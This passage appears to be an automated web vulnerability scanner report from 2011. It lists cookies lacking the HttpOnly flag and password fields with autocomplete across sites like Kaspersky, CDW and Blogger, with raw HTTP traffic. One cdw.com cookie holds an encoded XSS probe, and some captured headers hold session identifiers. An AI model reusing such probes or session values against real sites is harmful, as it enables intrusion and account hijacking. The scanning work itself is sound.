Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 04 Sep 2011 14:55:14 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=KyMHIOSJzQEkAAAANDM5Yjc3MjctM2E5MC00YjYyLWIzMWQtNTAxMTQ2MTBiN2Jk0; expires=Mon, 03-Sep-2012 14:55:14 GMT; path=/; HttpOnly
Set-Cookie: hubspotutk=d9c6da11-1321-4424-8ecd-89961c04957c; domain=sophelle.app5.hubspot.com; expires=Sat, 04-Sep-2021 05:00:00 GMT; path=/; HttpOnly
Vary: Accept-Encoding
Set-Cookie: HUBSPOT159=554767532.0.0000; path=/
Content-Length: 497

var hsUse20Servers = true;
var hsDayEndsIn = 47085;
var hsWeekEndsIn = 47085;
var hsMonthEndsIn = 2293485;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-09-04 10:55:
...[SNIP]...

10.75. http://tr.adinterax.com/re/computerworld%2CNWW_citrix_netscaler_f5_shadow_WelAd_090411_bonus%2CC%3DCitrix%2CP%3DNetworkWorld%2CA%3DCitrix%2CK%3D3059920/0.7740005844020561/0/ti.0%2Cai.0/ti.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tr.adinterax.com
Path:	/re/computerworld%2CNWW_citrix_netscaler_f5_shadow_WelAd_090411_bonus%2CC%3DCitrix%2CP%3DNetworkWorld%2CA%3DCitrix%2CK%3D3059920/0.7740005844020561/0/ti.0%2Cai.0/ti.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

adxid=013eab4e638f435a; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
adxf=3059920@1@221; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.76. http://www.barracudanetworks.com/ns/products/web-application-controller-overview.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.barracudanetworks.com
Path:	/ns/products/web-application-controller-overview.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

barra_hidden_menus=a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3Bi%3A1%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; expires=Tue, 04-Oct-2011 14:06:21 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ns/products/web-application-controller-overview.php HTTP/1.1
Host: www.barracudanetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.77. http://www.blogger.com/reviews/json/aggregates previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blogger.com
Path:	/reviews/json/aggregates

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=fac6fb9c375987fe:U=52bea4e64ac68685:TM=1315139666:LM=1315141157:S=-nsNxGd7uZCeZEs4; expires=Tue, 03-Sep-2013 12:59:17 GMT; path=/; domain=www.blogger.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /reviews/json/aggregates HTTP/1.1
Host: www.blogger.com
Proxy-Connection: keep-alive
Referer: http://www.blogger.com/blog-post-reactions.g?options=%5Bfunny,+interesting,+cool%5D&textColor=%23666666
Content-Length: 260
Origin: http://www.blogger.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: blogger_TID=91a34a5f93d8b0d1; S=blogger=2snbojtaLFCqiwBrrVC5aw; __utma=150635877.1878220356.1314847150.1314984268.1315139702.3; __utmb=150635877.1.10.1315139702; __utmc=150635877; __utmz=150635877.1315139702.3.3.utmcsr=cloudscan.me|utmccn=(referral)|utmcmd=referral|utmcct=/2010/12/usakaperskycom-cross-site-scripting-xss.html

req={"entities":[{"url": "http%3A%2F%2Fwww.cloudscan.me%2F2010%2F12%2Fusakaperskycom-cross-site-scripting-xss.html","groups":["reactions"]},{"url": "http%3A%2F%2Fwww.cloudscan.me%2F2010%2F12%2Fusakape
...[SNIP]...

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
X-Frame-Options: ALLOWALL
Date: Sun, 04 Sep 2011 12:59:17 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Set-Cookie: PREF=ID=fac6fb9c375987fe:U=52bea4e64ac68685:TM=1315139666:LM=1315141157:S=-nsNxGd7uZCeZEs4; expires=Tue, 03-Sep-2013 12:59:17 GMT; path=/; domain=www.blogger.com
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Server: zfe
Content-Length: 465
X-XSS-Protection: 1; mode=block

{"channelHeader":{"token":"AIe9_BHksqH_JbHcrH2_dociyq-qbOKJzhjtRh-iAsLQ81BtJ-caMlUlhl-AqnX5ES6OHj4CLXtgCq4zJ_wLWr_vDBADknx45ICLpn_60DzgRICkz35FPfSid7XKoeWrW5Xkmqo197Kx5ZoQHVY2kVdzYilV_A954w"},"user":{
...[SNIP]...

10.78. http://www.cdw.com/TabStatus.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cdw.com
Path:	/TabStatus.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

3039D25F6DEC4E47B474C3FC71519575=A8A8F83D13EA4F8B917AA5F211762060=75165C11D5234F7D9CF742C32889F929&BA9AA5C91598458BA251A10B273627B6=A04B0B4F3A184E6F9B2F6C8FA16E6CB4&813F9F7AA3924BBEB886AA375A9E8321=&925E59B88B6B46AEB9CB495BFF4D7D2C=&806B512B4E7948E3A3481CCA3CB230A5=&ECDC4F474BB24C7FB7CF910AF2E97643=%2fshop%2fsearch%2fhub.aspx%3fwclss%3dF%261d6ea%2522%253e%253cscript%253eprompt%2528document.location%2529%253c%252fscript%253ed7742b51610%3d1; domain=.cdw.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.79. http://www.cfoworld.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cfoworld.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_dgpxpsme=44593ca729a0;expires=Sun, 04-Sep-11 14:16:23 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.cfoworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.80. http://www.cio.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cio.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_djp.dpn=44593c713660;expires=Sun, 04-Sep-11 14:16:31 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.cio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.81. http://www.csoonline.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_djp.dpn=44593c703660;expires=Sun, 04-Sep-11 14:16:41 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.82. http://www.etracker.de/cnt.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.etracker.de
Path:	/cnt.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

etcnt_65655=35d5f3ff77839ba89beecc615e323854%2C1315138532%2C2; expires=Sun, 02-Oct-2011 12:15:32 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cnt.php?v=3.0&java=y&tc=1315138456484&et_tz=300&et=86m8Nm&et_ilevel=0&swidth=1920&sheight=1200&siwidth=1233&siheight=1037&scookie=1&scolor=16&et_pagename=/security/news/item/phpMyAdmin-updates-close-XSS-hole-1331093.html&et_areas=security&et_target=,0,0,0,0&et_se=4&et_url=http%3A//www.h-online.com/security/news/item/phpMyAdmin-updates-close-XSS-hole-1331093.html&slang=en-US&ref=http%3A//www.google.com/%23sclient%3Dpsy%26hl%3Den%26tbm%3Dnws%26source%3Dhp%26q%3D%2522xss.cx%2522%26pbx%3D1%26oq%3D%2522xss.cx%2522%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0%26fp%3D1%26biw%3D1407%26bih%3D931%26bav%3Don.2%2Cor.r_gc.r_pw.%26cad%3Db&p=Shockwave%20Flash%2010.3%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%201.6.0_26%3BSilverlight%20%204.0.60531.0%3BChrome%20PDF%20Viewer%3BJavascript%201.7 HTTP/1.1
Host: www.etracker.de
Proxy-Connection: keep-alive
Referer: http://www.h-online.com/security/news/item/phpMyAdmin-updates-close-XSS-hole-1331093.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: etcnt_65655=35d5f3ff77839ba89beecc615e323854%2C1314978165%2C1

Response

HTTP/1.1 200 OK
Expires: Wed, 11 Nov 1998 11:11:11 GMT
P3P: CP="NON DSP NID CURa OUR IND UNI"
Set-Cookie: etcnt_65655=35d5f3ff77839ba89beecc615e323854%2C1315138532%2C2; expires=Sun, 02-Oct-2011 12:15:32 GMT; path=/
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Date: Sun, 04 Sep 2011 12:15:32 GMT
Connection: close
Last-Modified: Sun, 04 Sep 2011 12:15:32 GMT
Server: Apache
Content-Type: image/gif
Pragma: no-cache

GIF89a.............!.......,...........D..;

10.83. http://www.itworld.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.itworld.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.itworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.84. http://www.kaspersky.com/images/newdesign/arabic.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kaspersky.com
Path:	/images/newdesign/arabic.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ClientRoute=dcf4cb79165bcf71c1c5e0d6abdde335e3e82bee53b28749f57dd13f71437d67;Path=/;Domain=www.kaspersky.com
uid=AAAABU5ja4tTnSu8B8qDAg==; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/newdesign/arabic.gif HTTP/1.1
Host: www.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARRAffinity=626195b14dcbcaf8caa45bba8c7c3e8b7eeadfcfb06a90c0be59e3eadecbc0cd; ASP.NET_SessionId=dy2rho55neryknbekaogdgil

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Content-Length: 144
Content-Type: image/gif
Expires: Sun, 04 Sep 2011 13:14:03 GMT
Last-Modified: Fri, 03 Sep 2010 10:02:01 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/7.0
Set-Cookie: ClientRoute=dcf4cb79165bcf71c1c5e0d6abdde335e3e82bee53b28749f57dd13f71437d67;Path=/;Domain=www.kaspersky.com
Set-Cookie: uid=AAAABU5ja4tTnSu8B8qDAg==; path=/
X-Powered-By: ARR/2.5
X-Powered-By: Kaspersky Lab
Date: Sun, 04 Sep 2011 12:13:59 GMT

GIF89aE............mU...!.......,....E....a...(....m.......5.h..Y..:.-........R}.....t ..G..(8YM.T6....:. ..,.....].......+{ZJ..hq.#..,...S..;

10.85. http://www.kaspersky.com/images/newdesign/china.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kaspersky.com
Path:	/images/newdesign/china.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ClientRoute=dcf4cb79165bcf71c1c5e0d6abdde335e3e82bee53b28749f57dd13f71437d67;Path=/;Domain=www.kaspersky.com
uid=AAAABU5ja4tTnSu8B8qBAg==; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/newdesign/china.gif HTTP/1.1
Host: www.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARRAffinity=626195b14dcbcaf8caa45bba8c7c3e8b7eeadfcfb06a90c0be59e3eadecbc0cd; ASP.NET_SessionId=dy2rho55neryknbekaogdgil

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Content-Length: 73
Content-Type: image/gif
Expires: Sun, 04 Sep 2011 13:14:03 GMT
Last-Modified: Thu, 02 Sep 2010 09:55:01 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/7.0
Set-Cookie: ClientRoute=dcf4cb79165bcf71c1c5e0d6abdde335e3e82bee53b28749f57dd13f71437d67;Path=/;Domain=www.kaspersky.com
Set-Cookie: uid=AAAABU5ja4tTnSu8B8qBAg==; path=/
X-Powered-By: ARR/2.5
X-Powered-By: Kaspersky Lab
Date: Sun, 04 Sep 2011 12:13:59 GMT

GIF89a.. .....mU...!.......,...... ... ..w........,....-..]..u.XB.... ..;

10.86. http://www.kaspersky.com/images/newdesign/japan.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kaspersky.com
Path:	/images/newdesign/japan.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ClientRoute=dcf4cb79165bcf71c1c5e0d6abdde335e3e82bee53b28749f57dd13f71437d67;Path=/;Domain=www.kaspersky.com
uid=AAAABU5ja4tTiSu6B4+4Ag==; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/newdesign/japan.gif HTTP/1.1
Host: www.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARRAffinity=626195b14dcbcaf8caa45bba8c7c3e8b7eeadfcfb06a90c0be59e3eadecbc0cd; ASP.NET_SessionId=dy2rho55neryknbekaogdgil

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Content-Length: 73
Content-Type: image/gif
Expires: Sun, 04 Sep 2011 13:14:03 GMT
Last-Modified: Thu, 02 Sep 2010 09:55:01 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/7.0
Set-Cookie: ClientRoute=dcf4cb79165bcf71c1c5e0d6abdde335e3e82bee53b28749f57dd13f71437d67;Path=/;Domain=www.kaspersky.com
Set-Cookie: uid=AAAABU5ja4tTiSu6B4+4Ag==; path=/
X-Powered-By: ARR/2.5
X-Powered-By: Kaspersky Lab
Date: Sun, 04 Sep 2011 12:13:59 GMT

GIF89a.. .....mU...!.......,...... ... .o....ZT...r].&.E.h.&).\.>k.h....;

10.87. http://www.kaspersky.com/images/newdesign/korea.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kaspersky.com
Path:	/images/newdesign/korea.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ClientRoute=dcf4cb79165bcf71c1c5e0d6abdde335e3e82bee53b28749f57dd13f71437d67;Path=/;Domain=www.kaspersky.com
uid=AAAABU5ja4tTiSu6B4+5Ag==; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/newdesign/korea.gif HTTP/1.1
Host: www.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARRAffinity=626195b14dcbcaf8caa45bba8c7c3e8b7eeadfcfb06a90c0be59e3eadecbc0cd; ASP.NET_SessionId=dy2rho55neryknbekaogdgil

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Content-Length: 77
Content-Type: image/gif
Expires: Sun, 04 Sep 2011 13:14:03 GMT
Last-Modified: Thu, 02 Sep 2010 09:55:01 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/7.0
Set-Cookie: ClientRoute=dcf4cb79165bcf71c1c5e0d6abdde335e3e82bee53b28749f57dd13f71437d67;Path=/;Domain=www.kaspersky.com
Set-Cookie: uid=AAAABU5ja4tTiSu6B4+5Ag==; path=/
X-Powered-By: ARR/2.5
X-Powered-By: Kaspersky Lab
Date: Sun, 04 Sep 2011 12:13:59 GMT

GIF89a..
.....mU...!.......,......
...$L.vz..WT..T.....Q.u]..1...j....irY/..;

10.88. http://www.kaspersky.com/images/newdesign/russia.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kaspersky.com
Path:	/images/newdesign/russia.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ClientRoute=dcf4cb79165bcf71c1c5e0d6abdde335e3e82bee53b28749f57dd13f71437d67;Path=/;Domain=www.kaspersky.com
uid=AAAABU5ja4tTnSu5B8nwAg==; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/newdesign/russia.gif HTTP/1.1
Host: www.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARRAffinity=626195b14dcbcaf8caa45bba8c7c3e8b7eeadfcfb06a90c0be59e3eadecbc0cd; ASP.NET_SessionId=dy2rho55neryknbekaogdgil

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Content-Length: 92
Content-Type: image/gif
Expires: Sun, 04 Sep 2011 13:14:03 GMT
Last-Modified: Thu, 02 Sep 2010 09:55:01 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/7.0
Set-Cookie: ClientRoute=dcf4cb79165bcf71c1c5e0d6abdde335e3e82bee53b28749f57dd13f71437d67;Path=/;Domain=www.kaspersky.com
Set-Cookie: uid=AAAABU5ja4tTnSu5B8nwAg==; path=/
X-Powered-By: ARR/2.5
X-Powered-By: Kaspersky Lab
Date: Sun, 04 Sep 2011 12:13:58 GMT

GIF89a!.
.....mU...!.......,....!.
...3.......4...N}.Q_...B....hv...r.{........[.....t.(...;

10.89. http://www.qualys.com/forms/trials/qualysguard_freescan_landing/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.qualys.com
Path:	/forms/trials/qualysguard_freescan_landing/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

referer=deleted; expires=Sat, 04-Sep-2010 14:11:44 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forms/trials/qualysguard_freescan_landing/ HTTP/1.1
Host: www.qualys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:11:45 GMT
Server: corpweb/3.3a.QEL4
Vary: *
Set-Cookie: referer=deleted; expires=Sat, 04-Sep-2010 14:11:44 GMT; path=/
Keep-Alive: timeout=15, max=93
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 25709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <li
...[SNIP]...

10.90. http://www.youtube.com/results previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/results

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

GEO=4bd7a9240837a3fe79724fae6a6e6711cwsAAAAzVVMyF3tqTmOIRA==; path=/; domain=.youtube.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /results HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11. Password field with autocomplete enabled previous next
There are 25 instances of this issue:

http://account.theregister.co.uk/register/
http://digg.com/submit
http://forum.kaspersky.com/index.php
http://forum.kaspersky.com/index.php
https://lwn.net/login
http://twitter.com/kaspersky
http://twitter.com/search
http://virusalert.nl/
http://www.2linkme.com/
http://www.cdw.com/content/brands/trendmicro/default.aspx
http://www.cdw.com/shop/search/hubs/Products/Software/F.aspx
http://www.cdw.com/shop/search/software-titles/symantec-endpoint-protection.aspx
http://www.cdw.com/shop/search/software-titles/websense-web-security.aspx
http://www.h-online.com/userdb/sso
http://www.scmagazine.com.au/News/268907,kaspersky-website-vulnerable-to-xss.aspx
http://www.scmagazine.com.au/Tools/Email.aspx
http://www.securelist.com/en/
http://www.securelist.com/en/blog
http://www.securelist.com/en/blog/2312/Another_live_XSS_vulnerability
http://www.securelist.com/en/blog/2312/Another_live_XSS_vulnerability
http://www.securelist.com/en/find
http://www.securelist.com/en/polls
http://www.securelist.com/en/weblog
http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/
http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

11.1. http://account.theregister.co.uk/register/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://account.theregister.co.uk
Path:	/register/

Issue detail

The page contains a form with the following action URL:

http://account.theregister.co.uk/register/

The form contains the following password fields with autocomplete enabled:

password
confirm_password

Request

GET /register/ HTTP/1.1
Host: account.theregister.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.2. http://digg.com/submit previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The page contains a form with the following action URL:

http://digg.com/submit

The form contains the following password field with autocomplete enabled:

password

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.3. http://forum.kaspersky.com/index.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://forum.kaspersky.com
Path:	/index.php

Issue detail

The page contains a form with the following action URL:

http://forum.kaspersky.com/index.php?act=Login&CODE=01&CookieDate=1

The form contains the following password field with autocomplete enabled:

PassWord

Request

GET /index.php HTTP/1.1
Host: forum.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.4. http://forum.kaspersky.com/index.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://forum.kaspersky.com
Path:	/index.php

Issue detail

The page contains a form with the following action URL:

http://forum.kaspersky.com/index.php

The form contains the following password field with autocomplete enabled:

PassWord

Request

GET /index.php?act=post&do=reply_post&f=5&t=211812 HTTP/1.1
Host: forum.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://forum.kaspersky.com/index.php?s=82c6300bfd526a46875731ac58df8e9e&showtopic=211812
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; ev5=far%2Bhelp%2Bvirus; op646kaspersky_us_storepagegum=a01603h0892794r05t3df82794r05y3aoe389; forum_read=a%3A1%3A%7Bi%3A5%3Bi%3A1315144636%3B%7D; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315144595.2; __utmb=205612169.4.9.1315144595; __utmc=205612169; __utmz=205612169.1315144595.2.2.utmcsr=usa.kaspersky.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us; gpv_pageName=Products%20%26%20Services%20%7C%20Home%20Computer%20Security%20%7C%20PURE; intcamp=INT1673886; s_nr=1315144912919-Repeat; s_sq=kaspersky-usa%3D%2526pid%253DProducts%252520%252526%252520Services%252520%25257C%252520Home%252520Computer%252520Security%252520%25257C%252520PURE%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fpure%25253FICID%25253DINT1673886%252523BVRRWidgetID%2526ot%253DA; session_id=82c6300bfd526a46875731ac58df8e9e; topicsread=a%3A1%3A%7Bi%3A211812%3Bi%3A1315144885%3B%7D; __utma=134438630.1937195929.1315144680.1315144680.1315144680.1; __utmb=134438630.2.10.1315144680; __utmc=134438630; __utmz=134438630.1315144680.1.1.utmcsr=support.kasperskyamericas.com|utmccn=(referral)|utmcmd=referral|utmcct=/corporate/contact-information

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 04 Sep 2011 14:10:45 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: session_id=90abb7d3d75aefc168edcc625def8a56; path=/
Vary: Accept-Encoding
Content-Length: 10181

